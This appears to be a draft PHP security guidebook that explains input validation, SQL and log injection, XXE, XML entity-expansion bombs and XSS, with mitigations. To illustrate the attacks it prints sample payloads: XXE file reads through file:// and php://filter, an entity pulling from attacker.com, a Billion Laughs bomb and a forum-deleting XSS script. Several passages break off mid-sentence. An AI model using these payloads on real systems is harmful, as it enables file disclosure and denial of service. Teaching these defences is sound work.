PHP Security
Release 1.0a1
Padraic Brady
CHAPTER 1
Introduction
Some programmers will start to sweat at the very idea of a security vulnerability while others can quite literally argue
the definition of a security vulnerability to the point where they can confidently state it is not a
security vulnerability. In between may be programmers who do a lot of shoulder shrugging since
nothing has gone completely sideways on them before. It's a weird world out there.
Since the goal of web application security is to protect the users, ourselves and whoever else might
rely on the services that application provides, we need to understand a few basics:
1. Who wants to attack us?
2. How can they attack us?
3. What can we do to stop them?
somewhere. That conservative assumption holds because all web applications are built by Humans
- and Humans make mistakes. As a result, the concept of perfect security is a pipe dream. All
applications carry the risk of being vulnerable, so the job of programmers is to ensure that that risk
is minimised.
Mitigating the risk of suffering an attack on your web application requires a bit of thinking. As we
progress through this guide, I'll introduce possible ways of attacking a web application. Some will
be very obvious, some not. In all cases, the solution should take account of some basic security
principles.
damaging an attack could become. Perhaps, if the worst occurred, you would be able to mitigate
some of the damage with a few extra defences and design changes? Perhaps that traditional solution
you've been using has been supplanted by an even better solution?
have not yet been spotted or rectified by the documentation maintainers. The same goes for Stackoverflow.
Dedicated sources of security wisdom (whether PHP oriented or not) are generally of a higher
quality. The closest thing to a Bible for PHP security is actually the OWASP website and the
articles, guides and cheatsheets it offers. If OWASP says not to do something, please - just don't
do it!
1.6 Conclusion
TBD
CHAPTER 2
Input Validation
Input Validation is the outer defensive perimeter for your web application. This perimeter protects the core business logic, processing and output generation. Beyond the perimeter is everything considered potential enemy territory which is...literally everything other than the literal code
executed by the current request. All possible entrances and exits on the perimeter are guarded
day and night by trigger-happy sentries who prefer to shoot first and never ask questions. Connected to this perimeter are separately guarded (and very suspicious looking) allies including the
Model/Database and Filesystem. Nobody wants to shoot them but if they press their luck...pop.
Each of these allies has its own perimeter which may or may not trust ours.
Remember what I said about who to trust? As noted in the Introduction, we trust nothing and
nobody. The common phrase you will have seen in PHP is to never trust user input. This is
one of those compartmentalising by trust value issues I mentioned. In suggesting that users are
untrusted, we imply that everything else is trusted. This is untrue. Users are just the most obvious
untrusted source of input since they are known strangers over which we have no control.
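For example, a validation routine along these lines will happily accept a php:// URL; the resource path shown is purely illustrative:

$url = 'php://filter/read=convert.base64-encode/resource=/path/to/file';
if (filter_var($url, FILTER_VALIDATE_URL)) {
    // the php:// URL is accepted as a perfectly valid URL
}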
The above example passes the filter without issue. The problem with accepting a php:// URL is that
it can be passed to PHP functions which expect to retrieve a remote HTTP URL and not to return
data from executing PHP (via the PHP wrapper). The flaw in the above is that the filter options
have no method of limiting the URI scheme allowed and users expect this to be one of http, https
or mailto rather than some generic PHP specific URI. This is the sort of generic validation approach
we should seek to avoid at all costs.
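Consider what happens when a filter simply strips <script> tags from a crafted input; the input string here is purely illustrative:

$input = '<scr<script>ipt>alert(document.cookie);</scr</script>ipt>';
$filtered = str_replace(array('<script>', '</script>'), '', $input);
// $filtered now contains: <script>alert(document.cookie);</script>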
In the above example, naive filtering for a specific tag would achieve nothing since removing the
obvious <script> tag actually ensures that the remaining text is now a completely valid HTML
script element. The same principle applies to the filtering of any specific format and it underlines
also why Input Validation isn't the end of your application's defenses.
Rather than attempting to fix input, you should just apply a relevant whitelist validator and reject
such inputs - denying them any entry into the web application. Where you must filter, always filter
before validation and never after.
HTML forms are able to impose constraints on the input used to complete the form. You can restrict
choices using an option list, restrict a value using a minimum and maximum allowed number, and
set a maximum length for text. HTML5 is even more expressive. Browsers will validate URLs and
emails, can limit input on date, number and range fields (support for both is sketchy though), and
inputs can be validated using a Javascript regular expression included in the pattern attribute.
With all of these controls, it's important to remember that they are intended to make the user
experience more consistent. Any attacker can create a custom form that doesn't include any of the
constraints in your original form markup. They can even just use a programmed HTTP client to
automate form submissions!
Another example of external validation controls may be the constraints applied to the response
schema of third-party APIs such as Twitter. Twitter is a huge name and it's tempting to trust
them without question. However, since we're paranoid, we really shouldn't. If Twitter were ever
compromised, their responses may contain unsafe data we did not expect so we really do need to
apply our own validation to defend against such a disaster.
Where we are aware of the external validation controls in place, we may, however, monitor them
for breaches. For example, if a HTML form imposes a maxlength attribute but we receive input that
exceeds that length, it may be wise to consider this as an attempted bypass of validation controls
by a user. Using such methods, we could log breaches and take further action to discourage a
potential attacker through access denial or request rate limiting.
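A sketch of such a server-side check, where the 255 character limit mirrors a hypothetical maxlength attribute on the form and the log destination is illustrative:

$username = isset($_POST['username']) ? $_POST['username'] : '';
if (mb_strlen($username, 'UTF-8') > 255) {
    // the form's maxlength was bypassed; treat this as a probable attack
    error_log('Validation control bypass attempt from ' . $_SERVER['REMOTE_ADDR']);
    // reject the request, rate limit or deny access as appropriate
}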
When designing validators, be sure to prefer strict comparisons and use manual type conversion
where input or output values might be strings. Web forms, as an example, always return string data
so to work with a resulting expected integer from a form you would have to verify its type:
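Something along these lines, where the function names match the assertions that follow (the bodies themselves are assumptions):

function checkIntegerRange($int, $min, $max)
{
    // treat strings as valid only if they consist solely of digits
    if (is_string($int) && !ctype_digit($int)) {
        return null; // reject: not an integer at all
    }
    $int = (int) $int;
    return ($int >= $min && $int <= $max);
}

function checkIntegerRangeTheWrongWay($int, $min, $max)
{
    // loose comparison: on PHP 7 and earlier "6 OR 1=1" is silently cast to 6 here
    return ($int >= $min && $int <= $max);
}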
If you take the second approach, any string which starts with an integer that falls within the expected range would pass validation.

assert(checkIntegerRange('6 OR 1=1', 5, 10)); // issues NULL/Warning correctly
assert(checkIntegerRangeTheWrongWay('6 OR 1=1', 5, 10)); // returns TRUE incorrectly
Type casting naughtiness abounds in many operations and functions such as in_array() which is
often used to check if a value exists in an array of valid options.
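A quick illustration (the option list is purely illustrative); the third parameter forces a strict, type-aware comparison:

$validOptions = array(1, 2, 3);
var_dump(in_array('1', $validOptions));       // bool(true)  - loose comparison across types
var_dump(in_array('1', $validOptions, true)); // bool(false) - strict comparison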
encryption of the data they will be exchanging. Encryption by itself is useless in this case because
we never challenged the MITM server to prove it was the actual server we wanted to contact. That
is why Step 2, while technically optional, is actually completely necessary. The web application
MUST verify the identity of the server it contacted in order to defend against MITM attacks.
Due to a widespread perception that encryption prevents MITM attacks, many applications and
libraries do not apply Step 2. It's both a common and easily detected vulnerability in open source
software. PHP itself, due to reasons beyond the understanding of mere mortals, disables server
verification by default for its own HTTPS wrapper when using stream_socket_client(), fsockopen()
or other internal functions. For example:
$body = file_get_contents('https://api.example.com/search?q=sphinx');
The above suffers from an obvious MITM vulnerability and any data resulting from such a HTTPS
request can never be considered as representing a response from the intended service. This request
should have been made by enabling server verification as follows:
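One way to do that is with an SSL stream context; the options shown and the CA bundle path are assumptions that vary by PHP version and system:

$context = stream_context_create(array(
    'ssl' => array(
        'verify_peer' => true,
        // older PHP releases (pre 5.6) also need an explicit CA bundle:
        'cafile' => '/etc/ssl/certs/ca-certificates.crt',
    ),
));
$body = file_get_contents('https://api.example.com/search?q=sphinx', false, $context);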
Returning to sanity, the cURL extension does enable server verification out of the box so no option
setting is required. However, programmers may demonstrate the following crazy approach to
securing their libraries and applications. This one is easy to search for in any libraries your web
application will depend on.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
Disabling peer verification in either PHP's SSL context or with curl_setopt() will enable a MITM
vulnerability but it's commonly allowed to deal with annoying errors - the sort of errors that may
indicate an MITM attack or that the application is attempting to communicate with a host whose
SSL certificate is misconfigured or expired.
Web applications can often behave as a proxy for user actions, e.g. acting as a Twitter Client. The
least we can do is hold our applications to the high standards set by browsers who will warn their
users and do everything possible to prevent users from reaching suspect servers.
2.4 Conclusion
TBD
CHAPTER 3
Injection Attacks
The OWASP Top 10 lists Injection and Cross-Site Scripting (XSS) as the most common security
risks to web applications. Indeed, they go hand in hand because XSS attacks are contingent on a
successful Injection attack. While this is the most obvious partnership, Injection is not just limited
to enabling XSS.
Injection is an entire class of attacks that rely on injecting data into a web application in order to
facilitate the execution or interpretation of malicious data in an unexpected manner. Examples of
attacks within this class include Cross-Site Scripting (XSS), SQL Injection, Header Injection, Log
Injection and Full Path Disclosure. I'm scratching the surface here.
This class of attacks is every programmer's bogeyman. They are the most common and successful attacks on the internet due to their numerous types, large attack surface, and the complexity
sometimes needed to protect against them. All applications need data from somewhere in order to
function. Cross-Site Scripting and UI Redress are, in particular, so common that I've dedicated the
next chapter to them and these are usually categorised separately from Injection Attacks as their
own class given their significance.
OWASP uses the following definition for Injection Attacks:
Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an
interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into
executing unintended commands or accessing unauthorized data.
the data comes from another source including the database itself. Programmers will often trust
data from their own database believing it to be completely safe without realising that being safe for
one particular usage does not mean it is safe for all other subsequent usages. Data from a database
should be treated as untrusted unless proven otherwise, e.g. through validation processes.
If successful, an SQL Injection can manipulate the SQL query being targeted to perform a database
operation not intended by the programmer.
Consider the following query:
$db = new mysqli('localhost', 'username', 'password', 'storedb');
$result = $db->query(
    'SELECT * FROM transactions WHERE user_id = ' . $_POST['user_id']
);
The above has a number of things wrong with it. First of all, we haven't validated the contents
of the POST data to ensure it is a valid user_id. Secondly, we are allowing an untrusted source to
tell us which user_id to use - an attacker could set any valid user_id they wanted to. Perhaps the
user_id was contained in a hidden form field that we believed safe because the web form would
not let it be edited (forgetting that attackers can submit anything). Thirdly, we have not escaped
the user_id or passed it to the query as a bound parameter which also allows the attacker to inject
arbitrary strings that can manipulate the SQL query given we failed to validate it in the first place.
The above three failings are remarkably common in web applications.
As to trusting data from the database, imagine that we searched for transactions using a user_name
field. Names are reasonably broad in scope and may include quotes. It's conceivable that an
attacker could store an SQL Injection string inside a user name. When we reuse that string in a
later query, it would then manipulate the query string if we considered the database a trusted source
of data and failed to properly escape or bind it.
Another factor of SQL Injection to pay attention to is that persistent storage need not always occur
on the server. HTML5 supports the use of client side databases which can be queried using SQL
with the assistance of Javascript. There are two APIs facilitating this: WebSQL and IndexedDB.
WebSQL was deprecated by the W3C in 2010 and is supported by WebKit browsers using SQLite
in the backend. Its support in WebKit will likely continue for backwards compatibility purposes
even though it is no longer recommended for use. As its name suggests, it accepts SQL queries and
may therefore be susceptible to SQL Injection attacks. IndexedDB is the newer alternative but is a
NOSQL database (i.e. does not require usage of SQL queries).
or query parts without enforcing parameter binding. Otherwise you should just avoid the need to
escape altogether. It's messy, error-prone and differs by database extension.
Parameterised Queries (Prepared Statements)
Parameterisation or Parameter Binding is the recommended way to construct SQL queries and all
good database libraries will use this by default. Here is an example using PHP's PDO extension.
if (ctype_digit($_POST['id'])) { // POST data is always a string, so a digits-only check suffices
    $validatedId = (int) $_POST['id'];
    $pdo = new PDO('mysql:host=localhost;dbname=storedb', 'username', 'password'); // DSN and credentials are placeholders
    $stmt = $pdo->prepare('SELECT * FROM transactions WHERE user_id = :id');
    $stmt->bindParam(':id', $validatedId, PDO::PARAM_INT);
    $stmt->execute();
} else {
    // reject id value and report error to user
}
The bindParam() method available for PDO statements allows you to bind parameters to the
placeholders present in the prepared statement and accepts a basic datatype parameter such
as PDO::PARAM_INT, PDO::PARAM_BOOL, PDO::PARAM_LOB and PDO::PARAM_STR.
This defaults to PDO::PARAM_STR if not given so remember it for other values!
Unlike manual escaping, parameter binding in this fashion (or any other method used by your
database library) will correctly escape the data being bound automatically so you don't need to recall which escaping function to use. Using parameter binding consistently is also far more reliable
than remembering to manually escape everything.
Enforce Least Privilege Principle
Putting the brakes on a successful SQL Injection is just as important as preventing it from occurring
in the first place. Once an attacker gains the ability to execute SQL queries, they will be doing so
as a specific database user. The principle of Least Privilege can be enforced by ensuring that all
database users are given only those privileges which are absolutely necessary for them in order to
complete their intended tasks.
If a database user has significant privileges, an attacker may be able to drop tables and manipulate
the privileges of other users under which the attacker can perform other SQL Injections. You
should never access the database from a web application as the root or any other highly privileged
or administrator level user so as to ensure this can never happen.
Another variant of the Least Privilege principle is to separate the roles of reading and writing data
to a database. You would have a user with sufficient privileges to perform writes and another
separate user restricted to a read-only role. This degree of task separation ensures that if an SQL
Injection targets a read-only user, the attacker cannot write or manipulate table data. This form of
compartmentalisation can be extended to limit access even further and so minimise the impact of
successful SQL Injection attacks.
Many web applications, particularly open source applications, are specifically designed to use
one single database user and that user is almost certainly never checked to see if they are highly
privileged or not. Bear the above in mind and don't be tempted to run such applications under an
administrative user.
accessible to the PHP process. The above functions will also accept a URL in PHP's default
configuration unless XXX is disabled.
Evaluation
PHP's eval() function accepts a string of PHP code to be executed.
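A purely hypothetical sketch of how untrusted input can end up inside eval():

// Unsafe: a request parameter is concatenated straight into eval()
$order = $_GET['order']; // expected to be "asc" or "desc"
eval('$sortOrder = "' . $order . '";');
// A request such as ?order=";phpinfo();// results in eval() running:
//   $sortOrder = "";phpinfo();//";
// i.e. whatever PHP the attacker chooses.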
Regular Expression Injection
The PCRE preg_replace() function in PHP allows for an e (PREG_REPLACE_EVAL)
modifier which means the replacement string will be evaluated as PHP after substitution. Untrusted
input used in the replacement string could therefore inject PHP code to be executed.
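A hypothetical sketch; note that the /e modifier was deprecated in PHP 5.5 and removed in PHP 7 in favour of preg_replace_callback():

// Unsafe: the replacement argument is evaluated as PHP for every match
$output = preg_replace('/^(.*)$/e', $untrustedReplacement, $subject);
// If $untrustedReplacement contains something like phpinfo(), it executes.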
Flawed File Inclusion Logic
Web applications, by definition, will include various files necessary to service any given request.
By manipulating the request path or its parameters, it may be possible to provoke the server into
including unintended local files by taking advantage of flawed logic in its routing, dependency
management, autoloading or other processes.
Such manipulations outside of what the web application was designed to handle can have unforeseen effects. For example, an application might unwittingly expose routes intended only for command line usage. The application may also expose other classes whose constructors perform tasks
(not a recommended way to design classes but it happens). Either of these scenarios could interfere
with the application's backend operations leading to data manipulation or a potential for Denial Of
Service (DOS) attacks on resource intensive operations not intended to be directly accessible.
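As a purely illustrative sketch of this kind of flawed logic (the parameter and directory names are assumptions):

// Hypothetical routing: the request decides which file gets included
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
include __DIR__ . '/pages/' . $page . '.php';
// A crafted value such as ?page=cli/rebuild-cache could pull in code that
// was never intended to be reachable from a browser.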
Server Misconfiguration
What if the attacker used a username of the form "Admin\nSuccessful login by Admin\n"?
If this string, from untrusted input, were inserted into the log the attacker would have successfully
disguised their failed login attempt as an innocent failure by the Admin user to login. Adding a
successful retry attempt makes the data even less suspicious.
Of course, the point here is that an attacker can append all manner of log entries. They can also
inject XSS vectors, and even inject characters to mess with the display of the log entries in a
console.
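A sketch of how this happens with a typical logging call; the log path and message format are assumptions:

// The username is written to the log exactly as the user supplied it
$username = $_POST['username'];
error_log('Failed login attempt by ' . $username . "\n", 3, '/var/log/app/auth.log');
// A username of "Admin\nSuccessful login by Admin" appends a fabricated,
// innocent-looking entry on its own line.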
More nefarious attacks using Log Injection may attempt to build on a Directory Traversal attack to
display a log in a browser. In the right circumstances, injecting PHP code into a log message and
calling up the log file in the browser can lead to a successful means of Code Injection which can
be carefully formatted and executed at will by the attacker. Enough said there. If an attacker can
execute PHP on the server, it's game over and time to hope you have sufficient Defense In Depth
to minimise the damage.
include(), require(), file_get_contents() or even less suspicious (for some people) functions such as DOMDocument::load().
The Dot-Dot-Slash sequence allows an attacker to tell the system to navigate or backtrack up to
the parent directory. Thus a path such as /var/www/public/../vendor actually points to
/var/www/vendor. The Dot-Dot-Slash sequence after /public backtracks to that
directory's parent, i.e. /var/www. As this simple example illustrates, an attacker can use this to
access files which lie outside of the /public directory that is accessible from the webserver.
Of course, path traversals are not just for backtracking. An attacker can also inject new path
elements to access child directories which may be inaccessible from a browser, e.g. due to a deny
from all directive in a .htaccess in the child directory or one of its parents. Filesystem
operations from PHP don't care about how Apache or any other webserver is configured to control
access to non-public files and directories.
an optional DOCTYPE and the expanded value they represent may reference an external resource
to be included. It is this capacity of ordinary XML to carry custom references which can be
expanded with the contents of an external resource that gives rise to an XXE vulnerability. Under
normal circumstances, untrusted inputs should never be capable of interacting with our system in
unanticipated ways and XXE is almost certainly unexpected for most programmers making it an
area of particular concern.
For example, let's define a new custom entity called harmless:
<!DOCTYPE results [ <!ENTITY harmless "completely harmless"> ]>
An XML document with this entity definition can now refer to the &harmless; entity anywhere
where entities are allowed:
<?xml version="1.0"?>
<!DOCTYPE results [<!ENTITY harmless "completely harmless">]>
<results>
<result>This result is &harmless;</result>
</results>
An XML parser such as PHP DOM, when interpreting this XML, will process this custom entity
as soon as the document loads so that requesting the relevant text will return the following:
This result is completely harmless
Custom entities obviously have a benefit in representing repetitive text and XML with shorter
named entities. It's actually not that uncommon where the XML must follow a particular grammar
and where custom entities make editing simpler. However, in keeping with our theme of not
trusting outside inputs, we need to be very careful as to what all the XML our application is
consuming is really up to. For example, this one is definitely not of the harmless variety:
<?xml version="1.0"?>
<!DOCTYPE results [<!ENTITY harmless SYSTEM "file:///var/www/config.ini">]>
<results>
<result>&harmless;</result>
</results>
Depending on the contents of the requested local file, the content could be used when expanding the
&harmless; entity and the expanded content could then be extracted from the XML parser and
included in the web application's output for an attacker to examine, i.e. giving rise to Information
Disclosure. The file retrieved will be interpreted as XML unless it avoids the special characters that
trigger that interpretation thus making the scope of local file content disclosure limited. If the file
is interpreted as XML but does not contain valid XML, an error will be the likely result preventing
disclosure of the contents. PHP, however, has a neat trick available to bypass this scope limitation
and remote HTTP requests can still, obviously, have an impact on the web application even if the
returned response cannot be communicated back to the attacker.
PHP offers three frequently used methods of parsing and consuming XML: PHP DOM,
SimpleXML and XMLReader. All three of these use the libxml2 extension and external entity
support is enabled by default. As a consequence, PHP has a by-default vulnerability to XXE which
makes it extremely easy to miss when considering the security of a web application or an XML
consuming library.
You should also remember that XHTML and HTML5 may both be serialised as valid XML which
may mean that some XHTML pages or XML-serialised HTML5 could be parsed as XML, e.g. by
using DOMDocument::loadXML() instead of DOMDocument::loadHTML(). Such uses of
an XML parser are also vulnerable to XML External Entity Injection. Remember that libxml2
does not currently even recognise the HTML5 DOCTYPE and so cannot validate it as it would for
XHTML DOCTYPES.
Examples of XML External Entity Injection
File Content And Information Disclosure
We previously met an example of Information Disclosure by noting that a custom entity in XML
could reference an external file.
<?xml version="1.0"?>
<!DOCTYPE results [<!ENTITY harmless SYSTEM "file:///var/www/config.ini">]>
<results>
<result>&harmless;</result>
</results>
This would expand the custom &harmless; entity with the file contents. Since all such requests
are done locally, it allows for disclosing the contents of all files that the application has read access
to. This would allow attackers to examine files that are not publicly available should the expanded
entity be included in the output of the application. The file contents that can be disclosed in this way
are significantly limited - they must be either XML themselves or a format which won't cause XML
parsing to generate errors. This restriction can, however, be completely ignored in PHP:
<?xml version="1.0"?>
<!DOCTYPE results [
<!ENTITY harmless SYSTEM
"php://filter/read=convert.base64-encode/resource=/var/www/config.ini"
>
]>
<results>
<result>&harmless;</result>
</results>
PHP allows access to a PHP wrapper in URI form as one of the protocols accepted by common
filesystem functions such as file_get_contents(), require(), require_once(),
file(), copy() and many more. The PHP wrapper supports a number of filters which can
be run against a given resource so that the results are returned from the function call. In the above
case, we use the convert.base64-encode filter on the target file we want to read.
What this means is that an attacker, via an XXE vulnerability, can read any accessible file in PHP
regardless of its textual format. All the attacker needs to do is base64 decode the output they
receive from the application and they can dissect the contents of a wide range of non-public files
with impunity. While this is not itself directly causing harm to end users or the application's
backend, it will allow attackers to learn quite a lot about the application they are attempting to
map which may allow them to discover other vulnerabilities with a minimum of effort and risk of
discovery.
Bypassing Access Controls
Access Controls can be dictated in any number of ways. Since XXE attacks are mounted on the
backend to a web application, it will not be possible to use the current user's session to any effect
but an attacker can still bypass backend access controls by virtue of making requests from the local
server. Consider the following primitive access control:
if (isset($_SERVER['HTTP_CLIENT_IP'])
    || isset($_SERVER['HTTP_X_FORWARDED_FOR'])
    || !in_array(@$_SERVER['REMOTE_ADDR'], array(
        '127.0.0.1',
        '::1',
    ))
) {
    header('HTTP/1.0 403 Forbidden');
    exit(
        'You are not allowed to access this file.'
    );
}
This snippet of PHP and countless others like it are used to restrict access to certain PHP files to
the local server, i.e. localhost. However, an XXE vulnerability in the frontend to the application
actually gives an attacker the exact credentials needed to bypass this access control since all HTTP
requests by the XML parser will be made from localhost.
<?xml version="1.0"?>
<!DOCTYPE results [
<!ENTITY harmless SYSTEM
"php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.ph
>
]>
<results>
<result>&harmless;</result>
</results>
If log viewing were restricted to local requests, then the attacker may be able to successfully grab
the logs anyway. The same thinking applies to maintenance or administration interfaces whose
access is restricted in this fashion.
Almost anything that can dictate how server resources are utilised could feasibly be used to generate a DOS attack. With XML External Entity Injection, an attacker has access to make arbitrary
HTTP requests which can be used to exhaust server resources under the right conditions.
See below also for other potential DOS uses of XXE attacks in terms of XML Entity Expansions.
Defenses against XML External Entity Injection
Considering the very attractive benefits of this attack, it might be surprising that the defense is extremely simple. Since DOM, SimpleXML, and XMLReader all rely on libxml2, we can simply
use the libxml_disable_entity_loader() function to disable external entity resolution.
This does not disable custom entities which are predefined in a DOCTYPE since these do not make
use of external resources which require a file system operation or HTTP request.
$oldValue = libxml_disable_entity_loader(true);
$dom = new DOMDocument();
$dom->loadXML($xml);
libxml_disable_entity_loader($oldValue);
You would need to do this for all operations which involve loading XML from a string, file or
remote URI.
Where external entities are never required by the application or for the majority of its requests,
you can simply disable external resource loading altogether on a more global basis which, in most
cases, will be far more preferable to locating all instances of XML loading, bearing in mind many
libraries are probably written with innate XXE vulnerabilities present:
libxml_disable_entity_loader(true);
Just remember to reset this once again to TRUE after any temporary enabling of external resource
loading. An example of a process which requires external entities in an innocent fashion is rendering Docbook XML into HTML where the XSL styling is dependent on external entities.
This libxml2 function is not, by any means, a silver bullet. Other extensions and PHP libraries
which parse or otherwise handle XML will need to be assessed to locate their off switch for
external entity resolution.
In the event that the above type of behaviour switching is not possible, you can alternatively check
if an XML document declares a DOCTYPE. If it does, and external entities are not allowed, you can
then simply discard the XML document, denying the untrusted XML access to a potentially vulnerable parser, and log it as a probable attack. If you log attacks this will be a necessary step since
there will be no other errors or exceptions to catch the attempt. This check should be built into your
normal Input Validation routines. However, this is far from ideal and it's strongly recommended to
fix the external entity problem at its source.
/**
 * Attempt a quickie detection
 */
$collapsedXML = preg_replace("/[[:space:]]/", '', $xml);
if (preg_match("/<!DOCTYPE/i", $collapsedXML)) {
    throw new \InvalidArgumentException(
        'Invalid XML: Detected use of illegal DOCTYPE'
    );
}
It is also worth considering that it's preferable to simply discard data that we suspect is the result of
an attack rather than continuing to process it further. Why continue to engage with something that
shows all the signs of being dangerous? Therefore, merging both steps from above has the benefit
of proactively ignoring obviously bad data while still protecting you in the event that discarding
data is beyond your control (e.g. 3rd-party libraries). Discarding the data entirely becomes far
more compelling for another reason stated earlier - libxml_disable_entity_loader()
does not disable custom entities entirely, only those which reference external resources. This can
still enable a related Injection attack called XML Entity Expansion which we will meet next.
In a generic entity expansion attack, also known as a Quadratic Blowup Attack, a custom entity is
defined as an extremely long string. When the entity is used numerous times throughout the document, the entity is expanded each time, leading to an XML structure which requires significantly
more RAM than the original XML size would suggest.
<?xml version="1.0"?>
<!DOCTYPE results [<!ENTITY long "SOME_SUPER_LONG_STRING">]>
<results>
<result>Now include &long; lots of times to expand
the in-memory size of this XML structure</result>
<result>&long;&long;&long;&long;&long;&long;&long;
&long;&long;&long;&long;&long;&long;&long;&long;
&long;&long;&long;&long;&long;&long;&long;&long;
&long;&long;&long;&long;&long;&long;&long;&long;
Keep it going...
&long;&long;&long;&long;&long;&long;&long;...</result>
</results>
By balancing the size of the custom entity string and the number of uses of the entity within the
body of the document, it's possible to create an XML file or string which will be expanded to use
up a predictable amount of server RAM. By occupying the server's RAM with repetitive requests
of this nature, it would be possible to mount a successful Denial Of Service attack. The downside
of the approach is that the initial XML must itself be quite large since the memory consumption is
based on a simple multiplier effect.
Recursive Entity Expansion
Where generic entity expansion requires a large XML input, recursive entity expansion packs more
punch per byte of input size. It relies on the XML parser to exponentially resolve sets of small
entities in such a way that their exponential nature explodes from a much smaller XML input size
into something substantially larger. It's quite fitting that this approach is also commonly called an
XML Bomb or Billion Laughs Attack.
<?xml version="1.0"?>
<!DOCTYPE results [
<!ENTITY x0 "BOOM!">
<!ENTITY x1 "&x0;&x0;">
<!ENTITY x2 "&x1;&x1;">
<!ENTITY x3 "&x2;&x2;">
<!-- Add the remaining sequence from x4...x100 (or boom) -->
<!ENTITY x99 "&x98;&x98;">
<!ENTITY boom "&x99;&x99;">
]>
<results>
<result>Explode in 3...2...1...&boom;</result>
</results>
The XML Bomb approach doesn't require a large XML size which might be restricted by the
application. Its exponential resolving of the entities results in a final text expansion that is 2^100
times the size of the &x0; entity value. That's quite a large and devastating BOOM!
Both normal and recursive entity expansion attacks rely on locally defined entities in the XML's
DTD but an attacker can also define the entities externally. This obviously requires that the XML
parser is capable of making remote HTTP requests which, as we met earlier in describing XML
External Entity Injection (XXE), should be disabled for your XML parser as a basic security measure. As a result, defending against XXEs defends against this form of XML Entity Expansion
attack.
Nevertheless, the way remote entity expansion works is by leading the XML parser into making
remote HTTP requests to fetch the expanded value of the referenced entities. The results will
then themselves define other external entities that the XML parser must additionally make HTTP
requests for. In this way, a couple of innocent looking requests can rapidly spiral out of control
adding strain to the server's available resources with the final result perhaps itself encompassing a
recursive entity expansion just to make matters worse.
<?xml version="1.0"?>
<!DOCTYPE results [
<!ENTITY cascade SYSTEM "http://attacker.com/entity1.xml">
]>
<results>
<result>3..2..1...&cascade;</result>
</results>
The above also enables a more devious approach to executing a DOS attack should the remote
requests be tailored to target the local application or any other application sharing its server resources. This can lead to a self-inflicted DOS attack where attempts to resolve external entities by
the XML parser may trigger numerous requests to locally hosted applications thus consuming an
even greater proportion of server resources. This method can therefore be used to amplify the impact of our earlier discussion about using XML External Entity Injection (XXE) attacks to perform
a DOS attack.
Defenses Against XML Entity Expansion
The obvious defenses here are inherited from our defenses for ordinary XML External Entity
(XXE) attacks. We should disable the resolution of custom entities in XML to local files and
remote HTTP requests by using the following function which globally applies to all PHP XML
extensions that internally use libxml2.
libxml_disable_entity_loader(true);
PHP does, however, have the quirky reputation of not implementing an obvious means
of completely disabling the definition of custom entities using an XML DTD via the
DOCTYPE. PHP does define a LIBXML_NOENT constant and there also exists public property
DOMDocument::$substituteEntities but neither, if used, has any ameliorating effect. It
appears we're stuck with using a makeshift set of workarounds instead.
Nevertheless, libxml2 does have a built-in default intolerance for recursive entity resolution which
will light up your error log like a Christmas tree. As such, there's no particular need to implement
a specific defense against recursive entities though we should do something anyway on the off
chance libxml2 suffers a relapse.
The primary new danger therefore is the inelegant approach of the Quadratic Blowup Attack or
Generic Entity Expansion. This attack requires no remote or local system calls and does not
require entity recursion. In fact, the only defense is to either discard XML or sanitise XML
where it contains a DOCTYPE. Discarding the XML is the safest bet unless use of a DOCTYPE
is both expected and we received it from a secured trusted source, i.e. we received it over
a peer-verified HTTPS connection. Otherwise we need to create some homebrewed logic in
the absence of PHP giving us a working option to disable DTDs. Assuming you have called
libxml_disable_entity_loader(TRUE), the following will work safely since entity expansion is deferred until the node value infected by the expansion is accessed (which does not
happen during this check).
$dom = new DOMDocument;
$dom->loadXML($xml);
foreach ($dom->childNodes as $child) {
    if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
        throw new \InvalidArgumentException(
            'Invalid XML: Detected use of illegal DOCTYPE'
        );
    }
}
CHAPTER 4
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) is probably the most common singular security vulnerability existing in
web applications at large. It has been estimated that approximately 65% of websites are vulnerable
to an XSS attack in some form, a statistic which should scare you as much as it does me.
We can extend this even further to the Javascript environment a web application introduces within
the browser. Client side Javascript can range from the very simple to the extremely complex, often
becoming client side applications in their own right. These client side applications must be secured
like any application, distrusting data received from remote sources (including the server-hosted
web application itself), applying input validation, and ensuring output to the DOM is correctly
escaped or sanitised.
Injected Javascript can be used to accomplish quite a lot: stealing cookie and session information,
performing HTTP requests with the user's session, redirecting users to hostile websites, accessing
and manipulating client-side persistent storage, performing complex calculations and returning
results to an attacker's server, attacking the browser or installing malware, leveraging control of
the user interface via the DOM to perform a UI Redress (aka Clickjacking) attack, rewriting or
manipulating in-browser applications, attacking browser extensions, and the list goes on...possibly
forever.
By some miracle, the forum software includes this signature as-is in all those spammed topics for
all the forum users to load into their browsers. The results should be obvious from the Javascript
code. The attacker is injecting an iframe into the page which will appear as a teeny tiny dot (zero
sized) at the very bottom of the page attracting no notice from anyone. The browser will send the
request for the iframe content which passes each user's cookie value as a GET parameter to the
attacker's URI where they can be collated and used in further attacks. While typical users aren't
that much of a target for an attacker, a well designed trolling topic will no doubt attract a moderator
or administrator whose cookie may be very valuable in gaining access to the forum's moderation
functions.
This is a simple example but feel free to extend it. Perhaps the attacker would like to know the
username associated with this cookie? Easy! Add more Javascript to query the DOM and grab
it from the current web page to include in a username= GET parameter to the attacker's URL.
Perhaps they also need information about your browser to handle a Fingerprint defense of the
session too? Just include the value from navigator.userAgent.
This simple attack has a lot of repercussions including potentially gaining control over the forum as
an administrator. It's for this reason that underestimating the potential of an XSS attack is ill advised.
Of course, being a simple example, there is one flaw with the attacker's approach. Similar to examples using Javascript's alert() function, I've presented something which has an obvious defense.
All cookies containing sensitive data should be tagged with the HttpOnly flag which prevents
Javascript from accessing the cookie data. The principle you should remember, however, is that if
the attacker can inject Javascript, they can probably inject all conceivable Javascript. If they can't
access the cookie and mount an attack using it directly, they will do what all good programmers
would do: write an efficient automated attack.
<script>
var params = 'type=topic&action=delete&id=347';
var http = new XMLHttpRequest();
http.open('POST', 'forum.com/admin_control.php', true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.setRequestHeader("Content-length", params.length);
http.setRequestHeader("Connection", "close");
http.onreadystatechange = function() {
if(http.readyState == 4 && http.status == 200) {
// Do something else.
}
};
http.send(params);
</script>
The above is one possible use of Javascript to execute a POST request to delete a topic. We
